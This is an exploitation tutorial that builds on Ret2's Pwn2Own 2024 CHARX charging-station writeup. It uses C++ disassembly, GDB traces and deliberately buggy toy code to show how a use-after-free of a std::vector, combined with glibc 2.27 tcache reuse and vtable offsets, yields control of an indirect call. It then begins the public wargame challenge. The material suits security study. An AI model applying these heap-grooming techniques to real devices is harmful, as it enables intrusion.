Analyzing C++ Compiler Vulnerabilities
Ret2 did a two-part writeup about a pwn2own 2024 challenge, where they exploited an electrical vehicle charging station: the CHARX SEC-3100. Both the solution and the firmware (which is not encrypted) are available online. The firmware is 32-bit ARM and runs in a Linux environment, and the updates are all squashfs’ed, ready to be flashed or unpacked. Their exploit relied on a use-after-free vulnerability, coupled with some interesting side effects from both the code and the standard library version used.
To accompany the Pwn2Own writeups, they also provide a public challenge, which is part of their wargames platform. To demonstrate the use-after-free vulnerability specifically, they also provide some toy code in the first of two writeups. Both the challenge and the toy code have the same UAF bug, which is triggered by the outer class’ destructor on exit.
I wanted to do a deeper dive into the conditions that lead to exploitation in both the toy code and the Wargames challenge code. The intention here is to walk through some C++ and GCC foundations to understand the problems they introduced in the firmware. Taken together, they pave the way to exploitation.
This analysis is broken up into a few parts, each of which build on Ret2’s writeup:
- Understanding the role of C++ virtual functions (and how to spot them)
- Tracing what free‘d elements look like in glibc’s tcache
- Seeing how an older glibc standard affects code compilation and execution
- Leveraging the placement of virtual functions in the vtable
Each section contains a quote from the second writeup which explains where my thinking was during exploitation. This writeup mostly focuses on how the C++ code compiles. Those understandings are really the key to solving the challenge.
Virtual Functions
Assuming we can control a node along this traversal, we can easily hijack control flow with the virtual call to
get_connection_id
.
Under the right conditions, you can hijack control flow by abusing virtual functions. This is a side side-effect of how they compile.
As a base case, let’s consider the following code:
class Item {
public:
void foo();
};
Implement Item::foo
with an innocuous definition:
void Item::foo() {
printf("foo\n");
}
Then, call it inside main
:
int main() {
Item item;
item.foo();
}
Compile it with debugging flags for clarity:
gcc -g demo.cpp -o demo
Then disassemble main
:
(gdb) set print asm-demangle on
(gdb) disas main
Dump of assembler code for function main():
0x000000000000113a <+0>: push rbp
0x000000000000113b <+1>: mov rbp,rsp
0x000000000000113e <+4>: sub rsp,0x10
0x0000000000001142 <+8>: lea rax,[rbp-0x1]
0x0000000000001146 <+12>: mov rdi,rax
0x0000000000001149 <+15>: call 0x1156 <Item::foo()>
0x000000000000114e <+20>: mov eax,0x0
0x0000000000001153 <+25>: leave
0x0000000000001154 <+26>: ret
Item::foo
compiles to its own function. Even if you compile it without the label, the invocation still calls a fixed offset.
Now, let’s only modify the Item
class to make foo
virtual:
class Item {
public:
virtual void foo();
};
Again, compile with debugging flags and disassemble main:
(gdb) disas main
Dump of assembler code for function main():
<+0>: push rbp
<+1>: mov rbp,rsp
<+4>: sub rsp,0x10
<+8>: lea rax,[rip+0x2c6f] # 0x3db8 <vtable for Item+16>
<+15>: mov QWORD PTR [rbp-0x8],rax
<+19>: lea rax,[rbp-0x8]
<+23>: mov rdi,rax
<+26>: call 0x1160 <Item::foo()>
<+31>: mov eax,0x0
<+36>: leave
<+37>: ret
Here, too, it compiles to a function at some fixed offset.
Recall that in main
, we use an instance of Item
. Let’s refactor it to use a pointer instead:
int main() {
Item *item_ptr = new Item{};
item_ptr->foo();
}
Notice how the invocation changes:
Dump of assembler code for function main():
0x000000000000115a <+0>: push rbp
0x000000000000115b <+1>: mov rbp,rsp
0x000000000000115e <+4>: push rbx
0x000000000000115f <+5>: sub rsp,0x18
0x0000000000001163 <+9>: mov edi,0x8
0x0000000000001168 <+14>: call 0x1030 <operator new(unsigned long)@plt>
0x000000000000116d <+19>: mov rbx,rax
0x0000000000001170 <+22>: mov QWORD PTR [rbx],0x0
0x0000000000001177 <+29>: mov rdi,rbx
0x000000000000117a <+32>: call 0x11d6 <Item::Item()>
0x000000000000117f <+37>: mov eax,0x0
0x0000000000001184 <+42>: mov QWORD PTR [rbp-0x18],rbx
0x0000000000001188 <+46>: test al,al
0x000000000000118a <+48>: je 0x1199 <main()+63>
0x000000000000118c <+50>: mov esi,0x8
0x0000000000001191 <+55>: mov rdi,rbx
0x0000000000001194 <+58>: call 0x1040
0x0000000000001199 <+63>: mov rax,QWORD PTR [rbp-0x18]
0x000000000000119d <+67>: mov rax,QWORD PTR [rax]
0x00000000000011a0 <+70>: mov rdx,QWORD PTR [rax]
0x00000000000011a3 <+73>: mov rax,QWORD PTR [rbp-0x18]
0x00000000000011a7 <+77>: mov rdi,rax
0x00000000000011aa <+80>: call rdx
0x00000000000011ac <+82>: mov eax,0x0
0x00000000000011b1 <+87>: mov rbx,QWORD PTR [rbp-0x8]
0x00000000000011b5 <+91>: leave
0x00000000000011b6 <+92>: ret
The actual function call is at main+80
:
(gdb) b *main+80
(gdb) r
Breakpoint 1, in main ()
(gdb) x/i $pc
=> 0x5555555551aa <main()+80>: call rdx
(gdb) ni
foo
So, the virtual function is set up with this chunk of instructions, and invoked with the call to RDX:
0x0000000000001199 <+63>: mov rax,QWORD PTR [rbp-0x18]
0x000000000000119d <+67>: mov rax,QWORD PTR [rax]
0x00000000000011a0 <+70>: mov rdx,QWORD PTR [rax]
0x00000000000011a3 <+73>: mov rax,QWORD PTR [rbp-0x18]
0x00000000000011a7 <+77>: mov rdi,rax
0x00000000000011aa <+80>: call rdx
This is conceptually similar to the way function pointers work in standard C. Observe that the call to fptr
is also a call to a register, RDX:
$ cat fptr.c
#include <stdio.h>
void do_something() {
printf("Hello\n");
}
int main() {
void (*fptr)() = 0;
fptr = &do_something;
fptr();
}
$ objdump --disassemble=main -Mintel fptr
...
<main>:
push rbp
mov rbp,rsp
sub rsp,0x10
mov QWORD PTR [rbp-0x8],0x0
lea rax,[rip+...] # <do_something>
mov QWORD PTR [rbp-0x8],rax
mov rdx,QWORD PTR [rbp-0x8]
mov eax,0x0
call rdx
mov eax,0x0
leave
ret
A major difference, however, is what’s happening behind the scenes. Every virtual function, which is defined in a class, will compile addresses to a “vtable,” which is a buffer of memory containing offsets to each virtual function. We can illustrate the vtable dereference chain by annotating the disassembly:
mov rax, [...] // *item
mov rax, [rax] // item->vtable
mov rdx, [rax] // item->vtable->foo
...
call rdx // call item->vtable->foo()
An interesting property of vtables is that, because it pulls a function at some offset, adding more virtual functions will usually compile at different offsets, and usually in order (although that’s not always a guarantee). Let’s check this out:
class Item {
public:
virtual void bar();
virtual void foo();
};
You can define bar
however you want, but we won’t be using it. Compile the code and disassemble it again. Note the change to the virtual call instructions:
mov rax,QWORD PTR [rbp-0x18]
mov rax,QWORD PTR [rax]
add rax,0x8
mov rdx,QWORD PTR [rax]
...
call rdx
The ADD RAX,0x8
instruction queries the vtable a little differently:
item->(vtable+0x8)->foo()
The address of Item::foo
exists at offset 0x8
in the Item pointer’s vtable.
Glibc’s tcache
Fully understanding glibc tcache internals isn’t necessary here; it suffices to say that a tcache bin is just a singly-linked list of free chunks of the same size, where the next pointer is placed at offset 0 in the free chunk.
The tcache is a glibc internal mechanism. It provides a way for the memory allocator to quickly re-use memory from “buckets” as opposed to pulling memory from the entire heap every time.
Unfortunately, it can be abused. Over the years, it’s served as the object of a few different exploit classes which involve dynamic memory allocation. We consider it in the context of a particular use-after-free (UAF) bug which involves a tcache entry and a free’d std::vector
.
The tcache was introduced in glibc 2.26 back in 2017. It still plays a major role in the its memory allocator today. There is a great video on tcache behavior and a good walkthrough on the source code. We’ll cover some basics and really focus on how they apply to the std::vector
type.
Let’s start by exploring the tcache entry. In glibc, a tcache_entry
is both a struct and a typedef of that struct:
typedef
struct tcache_entry
{
struct tcache_entry *next;
struct tcache_perthread_struct *key; // Avoids double-frees.
}
tcache_entry;
The std::vector
type is a C++ linked-list which can store arbitrary data types. Under the hood, it involves some dynamic memory allocations. It is a focus area of the Wargame challenge and is also the focus of discussion here.
Let’s start with some driver code.
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <vector>
int main() {
std::vector<uint64_t> v;
v.push_back(3);
v.push_back(5);
v.push_back(9);
v.push_back(13);
// Print the contents.
printf("0x%llu 0x%llu 0x%llu 0x%llu\n", v[0], v[1], v[2], v[3]);
// Explicitly destroy the vector.
v.~vector();
// Intentionally do a use-after free.
printf("0x%llu 0x%llu 0x%llu 0x%llu\n", v[0], v[1], v[2], v[3]);
}
This code prints the following:
0x3 0x5 0x9 0x13
0x188703 0x5337669691617803236 0x9 0x13
free(): double free detected in tcache 2
The first row is what we, the developer, expected. The second row is the consequence of using the vector after a free operation. There’s two important callouts with respect to the second row:
- The elements at
v[0]
andv[1]
represent data from a tcache entry: specifically, the next and key fields - The “double free” error implies that deleting a vector involves some dynamic memory allocation and deallocation
At the crash site, *next
is a pointer to 0x188703
and the *key
is 0x5337669691617803236
. Tcache entries exist only after you have free‘d some allocated memory. In C++, this can include destructors, the delete
operator, and classic calls to the free
standard library function.
struct tcache_entry *next: 0x188703
struct tcache_perthread_struct *key: 0x5337669691617803236
Tcache entries are linked lists of free‘d items of the same “bin” size. Bin sizes are usually sequences of powers of two, starting at some offset: 8, 16, 32, 64. The logic that defines each bin size is defined in malloc.c
, and like many things in glibc, its true definition is shrouded in macros.
Developers can use the output of the malloc_usable_size
function to help determine which bin an allocation will be free‘d to. Otherwise, you’re left to the debugger, but that’s sometimes all you really need.
In this example, the value of *next
(0x188703) is not an address and will not dereference to anything. This is expected because only one object of that bin’s size has been free‘d. If there were another object of an equivalent size that was free‘d before the vector, *next
would point to it instead.
So, to control the tcache, we need to free something else: something other than the vector, but of its same size.
Let’s do that now.
Finding allocation sizes for tcache bins
When this node is freed during the list destructor, the chunk will have a size class of
0x68
, and will be placed into the tcache bin of that size
Here, we want to consider what size some memory chunk will be by the time a vector is free‘d.
If you read the source code for a vector, you’ll notice that the vector class template actually extends the _Vector_base
structure. You’ll also notice a _Vector_impl _M_impl
field, which is the first field defined in this, and has a couple of allocation and deallocation methods near it. This _M_impl
structure is the backend of the vector type and is a major data structure responsible for many of its dynamic behaviors.
The first field in this structure represents the first item in the vector. In fact, when you view the address of a vector, this structure field is the address that you get back.
When the vector’s own destructor is called, it calls the destructor of ~Vector_base
last. Here’s the pared-down destructor definition for clarity:
~_Vector_base ()
{
ptrdiff_t __n = _M_impl._M_end_of_storage - _M_impl._M_start;
_M_deallocate (_M_impl._M_start, size_t (__n));
}
The _M_deallocate
function has a call path that leads to free
. It’s tracable in static analysis, but also a bit of a pain. It’s easier to appreciate in the debugger.
We can break at the call to the vector’s destructor in main, inspect the argument given, and then break on free. If we do one step, we land at the invocation of free, where we find that the vector’s address is being free‘d: that is, the _M_impl
structure, which is allocated at 0x6ee800
.
Breakpoint 6, in main
(gdb) x/i $pc
=> <main()+376>: call std::vector<>::~vector
(gdb) x/gx $rdi
0x7fffffffe150: 0x000055555556b2f0
(gdb) b *free
(gdb) c
Breakpoint 7, __GI___libc_free
(gdb) bt
#0 __GI___libc_free
#1 std::__new_allocator<>::deallocate
#2 std::allocator_traits<>::deallocate
#3 gned long, std::allocator<>::_M_deallocate
#4 std::_Vector_base<unsigned long, std::allocator<>::~_Vector_base
#5 std::vector<unsigned long, std::allocator<>::~vector
#6 main
(gdb) print/x $rdi
$8 = 0x55555556b2f0
Continue execution. Notice free is called only one time. So, the size of the data pointed to by _M_start
is our culprit for tcache binning.
If we can find the size of the _M_impl
structure when the vector is destroyed, we can get an idea of what sized allocations will end up the tcache bin where the vector itself ends up after it is free’d. In this way, we also find a link to its next
pointer. To help our analysis, we can reverse the logic from before and track which vector method actually allocates memory.
First, let’s acknowledge that the internal structure is initialized only after the vector is given some elements. We can observe this by tracking the memory from the vector’s creation until the first call to push_back
:
// The vector's internal structure is initialized to null.
(gdb) x/i $pc
=> main+20: call std::vector<>::vector
(gdb) x/gx $rdi
0x7fffffffe150: 0x00000000000011ff
(gdb) ni
(gdb) x/gx $rdi
0x7fffffffe150: 0x0000000000000000
(gdb) c
Continuing.
// The structure after the first call to vector::push_back.
Breakpoint 2 in main
(gdb) x/i $pc
=> main+47: call std::vector<>::push_back
(gdb) x/gx $rdi
0x7fffffffe150: 0x0000000000000000
(gdb) ni
(gdb) x/gx $rdi
0x7fffffffe0b0: 0x000055555556b2b0
We can then set a breakpoint on malloc
and continue execution to see the call path:
Breakpoint 1, main () at demo.cpp:6
(gdb) b *malloc
(gdb) c
Breakpoint 2, __GI___libc_malloc (bytes=8) at ./malloc/malloc.c:3301
(gdb) bt
#0 malloc
#1 operator new
#2 std::__new_allocator<>::allocate
#3 std::allocator_traits<>::allocate
#4 std::_Vector_base<>::_M_allocate
#5 std::vector<>::_M_realloc_append<>
#6 std::vector<>::emplace_back<>
#7 std::vector<>::push_back
#8 main
We can see that the call to push_back
leads to the allocation. Because malloc
accepts one argument, a size_t, we can see the initial allocation size by printing its first and only argument:
(gdb) print/x $rdi
$1 = 0x8
Indeed, 64-bit integers are eight bytes, so this matches our expectations.
Now, recall that each invocation of push_back
will actually call malloc
. This has some interesting implications.
To appreciate this, we will augment the non-pointer vector example to use a function called malloc_usable_size
, which is the target value we need in order to exploit the main code. I intentionally leave out any initial calls to push_back
so we can observe the output.
#include <vector>
#include <stdlib.h>
#include <malloc.h>
#include <stdio.h>
int main() {
std::vector<int> v;
auto v_data = v.data();
auto v_cast = static_cast<void*>(v_data);
auto v_usable = malloc_usable_size(v_cast);
printf("Vector backing usable: 0x%lx\n", v_usable);
}
This prints:
Vector backing usable: 0x0
This makes sense because we haven’t actually initialized the vector’s internal structure with memory. If we add one invocation of v.push_back(x)
, we get 0x4
(a 4-byte allocation). After five invocations, we get 0x40
(64 bytes), and so on.
Observe some other interesting behaviors:
- If you break on each execution of malloc, and inspect the argument at RDI, you can see the size of the vector’s internal data structure increase by 4, 8, 16, and 32, respectively.
- We can semi-formalize this growth as 22+N-1 if N > 0. The value 22 = 4 works out here because we’re using a vector of integers, and an int is four bytes (32-bits). If this were a 64-bit integer, we would adjust it to 23+N-1 if N > 0, given 23 = 8.
- Likewise, if you run something like
v.erase(v.begin())
, the size of the internal structure will not go down or reduce. - Finally, the call to
v.~vector
will free the internal structure, whose final size is that of the internal structure after all those calls topush_back
.
Exploiting older tcache implementations
Set a config value to a string of size
0x60
… UAF list traversal goes to 2nd fake node (the freed config string)
Strings can be convenient ways to control data. Here, they can play an interesting role in how the tcache works during a use-after-free condition.
Let’s build on the driver code from the tcache discussion and add some string allocations and deallocations:
#include <inttypes.h>
#include <stdio.h>
#include <vector>
#include <cstring>
const char *NAME = "AAAAAAAA"
"AAAAAAAA"
"AAAAAAAA"
"AAAAAAAA"
"AAAAAAAA"
"AAAAAAAA"
"AAAAAAAA"
"AAAAAAA";
int main() {
std::vector<uint64_t> v;
char *name = nullptr;
v.push_back(3);
v.push_back(5);
v.push_back(9);
v.push_back(13);
name = new char[0x40];
strncpy(name, (char *)NAME, 0x3f);
printf("%s\n", name);
delete name;
v.~vector();
printf("%lu\n", v[0]);
}
If we compile it with more recent glibc versions, it won’t do anything of interest, and we can’t control much. So let’s take a detour and see which versions are used by the Wargames challenge and the CHARX project. Recall that the CHARX project is available online and not encrypted, and that this specific Wargames challenge is open to the public, so it’s fair game to inspect them.
The CHARX executables were likely built with glibc 2.29:
strings CharxControllerAgent | grep -i GLIBC_
GLIBC_2.4
GLIBC_2.29
GLIBC_2.8
GLIBC_2.28
GLIBC_2.15
GLIBC_2.17
GLIBC_2.7
Likewise, the Wargames platform is likely using glibc 2.27:
wdb> vmmap
0x400000-0x409000 r-x charxpost_destructors
...
0x7f0000000000-0x7f0000029000 r-x ld-2.27.so
...
0x7f00007c4000-0x7f00009ab000 r-x libc-2.27.so
...
This gives us a range of versions to try out. The obvious way is to build glibc, ldd, and gcc using the specified versions. This would give us a chance to explore the differences in source code and further understand what changes in the memory allocator between old and current versions.
For now, we’re going to take a shortcut and just use an old Ubuntu container image, which is up to the spec we need:
root@cba6a210200c:/# grep VERSION= /etc/os-release
VERSION="18.04.6 LTS (Bionic Beaver)"
root@cba6a210200c:/# ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1.6) 2.27
We can substitute the CLI gcc
with a container that does the same thing but for a different version:
$ cat Dockerfile
FROM ubuntu:18.04
RUN apt update && \
apt install -y --no-install-recommends g++
ENTRYPOINT ["g++"]
$ docker build -t ret2gpp .
Then build the application, passing the G++ options to the container options:
docker run -v "$(pwd)":/code --rm ret2gpp \
-g -static /code/demo.cpp -o /code/demo
Note: The use of static
here is essential. Because any modern host system likely uses a different version of libc, you probably won’t observe the same behavior as you would when it’s executed on a system with that version of libc installed. By compiling as static, we provide a portable way to preserve those behaviors across different x64 systems.
Let’s open in GDB and break on the instruction just after the vector’s []
operator:
(gdb) disas main
...
0x0000000000400cf9 <+268>: call 0x400e10 <vector::operator[]>
0x0000000000400cfe <+273>: mov rax,QWORD PTR [rax]
...
(gdb) b *main+273
Breakpoint 1 at 0x400cfe: file /code/ver.cpp, line 32.
(gdb) r
...
Breakpoint 1, 0x0000000000400cfe in main () at /code/ver.cpp:32
32 printf("%lu\n", v[0]);
(gdb) x/i $pc
=> 0x400cfe <main()+273>: mov rax,QWORD PTR [rax]
(gdb) x/4gx $rax
0x6ee7a0: 0x00000000006ee7f0 0x00000000006dc1d0
0x6ee7b0: 0x0000000000000009 0x000000000000000d
Because we allocated and free’d some strings of the same usable size as the vector’s internal structure, the value of tcache_entry->next
at RAX (0x6ee7a0
) should point to one of those free’d entries:
(gdb) x/4gx 0x00000000006ee7f0
0x6ee7f0: 0x0000000000000000 0x00000000006dc1d0
0x6ee800: 0x4141414141414141 0x4141414141414141
The hex-encoded “A”s mean we were correct. This is the final tcache entry in this bin.
The important aspect here is that you have a way to control a buffer’s allocation size so you can match it against the target (here, the vector’s internal structure size). You can use previously discussed techniques to find it and adjust the string allocation. For example, the following patch to the code used in this section would work for a one-item vector.
...
std::vector<uint64_t> v;
v.push_back(3);
//printf("%lu\n", malloc_usable_size(static_cast<void*>(v.data()))); // 24
name = new char[24];
strncpy(name, (CHAR *)name, 23);
...
You’ll notice the first sixteen “A”s were wiped out by the tcache_entry
data, leaving only the final eight:
(gdb) x/4gx $rax
0x6f2730: 0x00000000006f2750 0x00000000006e01d0
0x6f2740: 0x0000000000000000 0x0000000000000021
(gdb) x/4gx 0x00000000006f2750
0x6f2750: 0x0000000000000000 0x00000000006e01d0
0x6f2760: 0x4141414141414141 0x0000000000000411
It should be obvious from the disassembly, but at this time, the strings provide no real advantage for exploitation. This is due entirely to the fact that we’re just pulling a long unsigned int and printing its value (ie, the tcache entry).
0x0000000000400cba <+205>: mov rax,QWORD PTR [rax]
0x0000000000400cbd <+208>: mov rsi,rax
...
0x0000000000400ccc <+223>: call 0x428ff0 <printf>
If we could trick the compiler into reading data from the tcache_entry->next+16
, we might gain some advantage for exploitation: either through a read or an execution.
The benefits of vtables
Our primitive has evolved from a simple UAF into an arbitrary virtual call
So far, we’ve considered two different types of code: that which uses virtual functions, and code that uses vulnerable tcache versions. Let’s combine the two concepts:
class Item {
public:
virtual void do_something();
};
...
int main() {
std::vector<Item *> v;
char *name = nullptr;
v.push_back(new Item{});
v[0]->do_something();
name = new char[24];
strncpy(name, (char *)NAME, 23);
printf("%s\n", name);
delete name;
v.~vector();
v[0]->do_something();
}
It will crash just before the virtual call to do_something
:
(gdb) x/i $pc
=> 0x400cf5 <main()+231>: mov rdx,QWORD PTR [rdx]
(gdb) x/gx $rax
0x6f2b80: 0x0000000000000000
(gdb) disas main
0x0000000000400cea <+220>: call 0x400e2e <vector::operator[]>
0x0000000000400cef <+225>: mov rax,QWORD PTR [rax]
0x0000000000400cf2 <+228>: mov rdx,QWORD PTR [rax]
=> 0x0000000000400cf5 <+231>: mov rdx,QWORD PTR [rdx]
...
0x0000000000400cfb <+237>: call rdx
This is no surprise given the data we looked at earlier. Zero is the value at 0x6f2750
:
(gdb) x/4gx $rax
0x6f2730: 0x00000000006f2750 0x00000000006e01d0
0x6f2740: 0x0000000000000000 0x0000000000000021
(gdb) x/4gx 0x00000000006f2750
0x6f2750: 0x0000000000000000 0x00000000006e01d0
0x6f2760: 0x4141414141414141 0x0000000000000411
We can vizualize it like:
rax, [rax] // *item
rdx, [rax] // item->vtable
rdx, [rdx] // item->vtable->do_something <fails to dereference 0x0
So, it fails when trying to dereference do_something
. This is completely understandable because we are, again, exploiting a use-after-free condition. The “vtable” is really pointing to the tcache->next
pointer, which contains the sixteen bytes needed for a tcache entry followed by any extra data.
Recall that tcache entries are all singly linked lists, whose first value will always point to another item of the same bin size. To (sort of) complete the vtable dereference, we can allocate and remove another string buffer whose size will also land in the same bin.
To keep it simple, let’s use an array of two names and perform the same allocation and deallocation operations on each element:
char *names[2];
...
for (int i = 0; i < 2; i++) {
names[i] = new char[24];
strncpy(names[i], (char *)NAME, 23);
printf("%s\n", names[i]);
}
for (int i = 0; i < 2; i++) {
delete names[i];
}
...
The extra free‘d string buffer gives us one more node to traverse in the tcache list:
(gdb) x/5i $pc
=> 0x400d28 <main()+282>: mov rax,QWORD PTR [rax]
0x400d2b <main()+285>: mov rdx,QWORD PTR [rax]
0x400d2e <main()+288>: mov rdx,QWORD PTR [rdx]
0x400d31 <main()+291>: mov rdi,rax
0x400d34 <main()+294>: call rdx
(gdb) x/4gx $rax
0x6f2750: 0x00000000006f2ba0 0x00000000006e01d0
0x6f2760: 0x0000000000000000 0x0000000000000411
(gdb) x/4gx 0x00000000006f2ba0
0x6f2ba0: 0x00000000006f2b80 0x00000000006e01d0
0x6f2bb0: 0x0041414141414141 0x000000000000f451
(gdb) x/4gx 0x00000000006f2b80
0x6f2b80: 0x0000000000000000 0x00000000006e01d0
0x6f2b90: 0x0041414141414141 0x0000000000000021
This completes the dereference path, but points it to data that we almost control. Here, it will make it to CALL RDX, but RDX will be zero, the value of 0x6f2b80.
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
(gdb) bt
#0 0x0000000000000000 in ?? ()
#1 0x0000000000400d36 in main ()
Recall from the earlier section on virtual functions that the vtable may adjust the target quadword that is dereferenced. If we add more virtual functions, we should be able to gain some control over execution.
Right now, the vtable looks like this, because it has one virtual function:
offset target function
------ ----------------
0x0 do_something
Let’s redefine Item
to include one new virtual function:
class Item {
public:
virtual void foo();
virtual void do_something();
};
This should adjust the vtable to look like this:
offset target function
------ ----------------
0x0 foo
0x8 do_something
Implement Item::foo
however you want. Then, compile it, and observe that an offset of 0x8 is added to the virtual call instructions:
0x0000000000400d2c <+286>: mov rax,QWORD PTR [rax]
0x0000000000400d2f <+289>: mov rdx,QWORD PTR [rax]
0x0000000000400d32 <+292>: add rdx,0x8
0x0000000000400d36 <+296>: mov rdx,QWORD PTR [rdx]
...
0x0000000000400d3c <+302>: call rdx
Let it run and let it crash:
Program received signal SIGSEGV, Segmentation fault.
0x00000000006e01d0 in ?? ()
Now, instead of failing at tcache_entry->next
, it fails at a fake tcache_entry->key
:
(gdb) x/4gx 0x00000000006f2b80
0x6f2b80: 0x0000000000000000 0x00000000006e01d0
0x6f2b90: 0x0041414141414141 0x0000000000000021
So, this matches what we expected to happen.
Now, let’s add a final trivial virtual function, bar
, to complete the vtable and gain some control over the execution:
offset target function
------ ----------------
0x0 foo
0x8 bar
0x10 do_something
CALL RDX now points to whatever we inserted in the buffer earlier:
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400d3c in main ()
42 v[0]->do_something();
(gdb) x/i $pc
=> 0x400d3c <main()+302>: call rdx
(gdb) print/x $rdx
$1 = 0x41414141414141
If the data we added to the string buffers was something more useful, like the address of an unreachable function, that function would execute here.
Wargames Writeup
Let’s jump into the challenge.
Use static analysis to make the following observations:
- The
Charger
class nests aChargePortManager
, which invokes a callback functionon_port_disconnected
. This is nearly identical to the dangerous behaviors described in the blog posts. - The
Charger
instance is declared in global scope. This will have a similar behavior to the writeups’ explanation of usingstatic
versions in themain
scope. Its destructor will be called in a scope that precedesmain
, so any weird behaviors won’t be obvious in static analysis. - There is an opportunity to create strings of an arbitrary buffer. These are the “names” of the two charge plug types. We can try to control data when these values are created (with
new
) and to send them to the tcache when they are free’d (withdelete
). - Although there’s no clear confirmation here, we can see references to
libc 2.27
in output fromvmmap
andinfo proc mappings
, so it’s reasonable to wonder if it’s using an older tcache version.
Start the program and don’t do anything (select option 6). Notice it exits gracefully.
Choice:
>> 6
==== EXECUTION FINISHED ====
Rerun the program and create one charge connector with option 1. You can choose either of the two connector types. For now, don’t give it a name.
Choice:
>> 1
Type of charging gun?
1. Standard
2. High Ampacity
Choice:
>> 1
Enter length of description (0 for no description):
>>
Charge gun added!
After the charger is created, exit the program. Notice it crashes hideously:
Choice:
>> 6
Segmentation Fault
rax: 0x0000000000000000
rbx: 0x0000000000000000
rcx: 0x0000000000000000
rdx: 0x00007fffffffeca0
rsi: 0x00007fffffffeca0
rdi: 0x00007fffffffec98
rbp: 0x00007fffffffecc0
rsp: 0x00007fffffffec80
rip: 0x000000000040205e
r8: 0x00007fffffffed93
r9: 0x0000000000000000
r10: 0x0000000000000006
r11: 0x00007f000085ba30
r12: 0x00007f0000baf718
r13: 0x0000000000000007
r14: 0x00007f0000bb4708
r15: 0x00007f0000bb0d80
fs: 0x0000000000000000
gs: 0x0000000000000000
eflags: 0x0000000000000000
Let’s inspect where the crash occurred:
wdb> backtrace
0x40205e in Charger::on_port_disconnected ()
0x401f23 in ChargePortManager::disconnect_port ()
0x401d91 in ChargePortManager::~ChargePortManager ()
0x40591e in Charger::~Charger ()
0x7f0000807161 in ()
wdb> x/i $pc
0x40205e <Charger::on_port_disconnected+120>: mov rax, qword ptr [rax]
Check out its source code:
void on_port_disconnected(int p) {
for (ChargeGun* gun : guns)
if (gun->uses_port(p)) {
gun->plugged_in = false;
break;
}
}
Now, zoom out of the disassembly, around the area of the crash:
0x40204e <+104>: call 0x402696 <__normal_iterator<ChargeGun**, std::vector<ChargeGun*> >::operator*>
0x402053 <+109>: mov rax, qword [rax]
0x402056 <+112>: mov qword [rbp-0x10], rax
0x40205a <+116>: mov rax, qword [rbp-0x10]
0x40205e <+120>: mov rax, qword [rax]
0x402061 <+123>: add rax, 0x10
0x402065 <+127>: mov rax, qword [rax]
0x402068 <+130>: mov ecx, dword [rbp-0x3c]
0x40206b <+133>: mov rdx, qword [rbp-0x10]
0x40206f <+137>: mov esi, ecx
0x402071 <+139>: mov rdi, rdx
0x402074 <+142>: call rax
The CALL RAX
command should stand out as the virtual call to on_port_disconnected
. We can backtrack some of the other steps to make sense of the behavior:
<+104>: call 0x402696 <__normal_iterator<ChargeGun**, std::vector<ChargeGun*> >::operator*>
<+109>: mov rax, qword [rax] ;
<+112>: mov qword [rbp-0x10], rax ;
<+116>: mov rax, qword [rbp-0x10] ; Address of charger
<+120>: mov rax, qword [rax] ; charger->vtable
<+123>: add rax, 0x10 ; charger->vtable[0x10]
<+127>: mov rax, qword [rax] ; charger->vtable[0x10]->uses_port
<+130>: mov ecx, dword [rbp-0x3c] ;
<+133>: mov rdx, qword [rbp-0x10] ;
<+137>: mov esi, ecx ; Value of p
<+139>: mov rdi, rdx ; Address of charger
<+142>: call rax ; call ChargeGunBase::uses_port()
We can see it’s failing to fetch the address of the charger, a side effect of the UAF condition. You can break here, restart the application, and remove a connector (option 2) to see the expected behavior and trace to the address of on_port_disconnected
.
Breakpoint 1: 0x40205e, Charger::on_port_disconnected+120
wdb> x/8i $pc
0x40205e <Charger::on_port_disconnected+120>: mov rax, qword ptr [rax]
0x402061 <Charger::on_port_disconnected+123>: add rax, 0x10
0x402065 <Charger::on_port_disconnected+127>: mov rax, qword ptr [rax]
0x402068 <Charger::on_port_disconnected+130>: mov ecx, dword ptr [rbp - 0x3c]
0x40206b <Charger::on_port_disconnected+133>: mov rdx, qword ptr [rbp - 0x10]
0x40206f <Charger::on_port_disconnected+137>: mov esi, ecx
0x402071 <Charger::on_port_disconnected+139>: mov rdi, rdx
0x402074 <Charger::on_port_disconnected+142>: call rax
wdb> print $rax
$3 = 0x61cea0
wdb> x/x $rax
0x61cea0: 0x00608d20
wdb> x/x 0x00608d20+0x10
0x608d30: 0x00401bdc
wdb> x/x 0x00401bdc
0x401bdc: 0xe5894855
wdb> x/i 0x00401bdc
0x401bdc <StandardChargeGun::uses_port+0>: push rbp
Here, you can see we created a StandardChargeGun subtype, so that’s where the function resolves. Additionally, you’ll notice that ChargeGun::uses_port
has no debugger labels, so you’ll need to pay attention to the subclass implementations. The fact that it maps to a common supertype is important to keep in mind.
Now that we better understand the intended behavior of this method, let’s circle back to the actual, problematic behavior. We proved that the UAF condition can manifest simply by creating a charge plug. If we control the vtable, we could control the code pointed-to in the call to ChargeGun::uses_port
.
As noted earlier, there is some sparse indication that this binary is using some form of GLIBC 2.27:
wdb> info proc mappings
...
0x7f0000000000-0x7f0000029000 r-x ld-2.27.so
0x7f0000029000-0x7f000002b000 rw-
0x7f000002b000-0x7f000002e000 rw-
0x7f0000229000-0x7f000022a000 r-- ld-2.27.so
0x7f000022a000-0x7f000022c000 rw- ld-2.27.so
...
0x7f00007c4000-0x7f00009ab000 r-x libc-2.27.so
0x7f00009ab000-0x7f0000bab000 --- libc-2.27.so
0x7f0000bab000-0x7f0000baf000 r-- libc-2.27.so
0x7f0000baf000-0x7f0000bb1000 rw- libc-2.27.so
We can recall the tcache behavior and how the use of character buffers facilitates arbitrary executions. As it turns out, we have some opportunity to abuse this if we look to the ChargeGun::description
field:
class ChargeGun {
public:
...
char* description;
ChargeGun() : plugged_in(false), description(0) {}
virtual ~ChargeGun() { delete description; }
...
};
You’ll notice that neither supertype has a method to safely handle or sanitize the description. Instead, as a public field, other functions can directly read and write that value. Only the supertype’s destructor plays any role in attempting to handle its destruction; but, as we will see in a bit, the behavior as defined is insufficient.
The ChargeGun::description
is initialized in the add_gun
function body:
void add_gun() {
...
ChargeGun* ngun;
...
if (dlen) {
ngun->description = new char[dlen+1];
printf("Enter description (manufacturer, ampacity, etc...): ");
fgets(ngun->description, dlen+1, stdin);
...
}
...
charger.guns.push_back(ngun);
}
